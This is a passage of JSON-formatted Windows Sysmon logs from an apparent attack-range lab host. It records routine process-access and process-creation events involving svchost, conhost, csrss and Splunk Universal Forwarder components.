C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4253,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4254,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4255,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4256,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.231\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nTargetProcessId: 1344\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.231","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-02FA-5F25-0000-00100C370600}","TargetProcessId":"1344","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4257,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:54.372\r\nSourceProcessGUID: {A837DB8D-02FA-5F25-0000-00100C370600}\r\nSourceProcessId: 1344\r\nSourceThreadId: 1348\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:54.372","SourceProcessGUID":"{A837DB8D-02FA-5F25-0000-00100C370600}","SourceProcessId":"1344","SourceThreadId":"1348","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+5691a5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+568cd6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56657|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+56ca7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-regmon.exe+8f3800|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:55","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4258,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.373\r\nProcessGuid: {A837DB8D-02FB-5F25-0000-001056390600}\r\nProcessId: 2528\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Windows Print Monitor \r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-winprintmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748\r\nParentProcessGuid: {A837DB8D-0239-5F25-0000-001064190500}\r\nParentProcessId: 2868\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.373","ProcessGuid":"{A837DB8D-02FB-5F25-0000-001056390600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","FileVersion":"8.0.2","Description":"Windows Print Monitor ","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-winprintmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748","ParentProcessGuid":"{A837DB8D-0239-5F25-0000-001064190500}","ParentProcessId":"2868","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4259,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nSourceProcessId: 2868\r\nSourceThreadId: 2168\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-02FB-5F25-0000-001056390600}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","SourceProcessId":"2868","SourceThreadId":"2168","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-02FB-5F25-0000-001056390600}","TargetProcessId":"2528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:51:55","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4260,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:51:55.372\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-02FB-5F25-0000-001056390600}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:51:55.372","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-02FB-5F25-0000-001056390600}","TargetProcessId":"2528","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:51:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
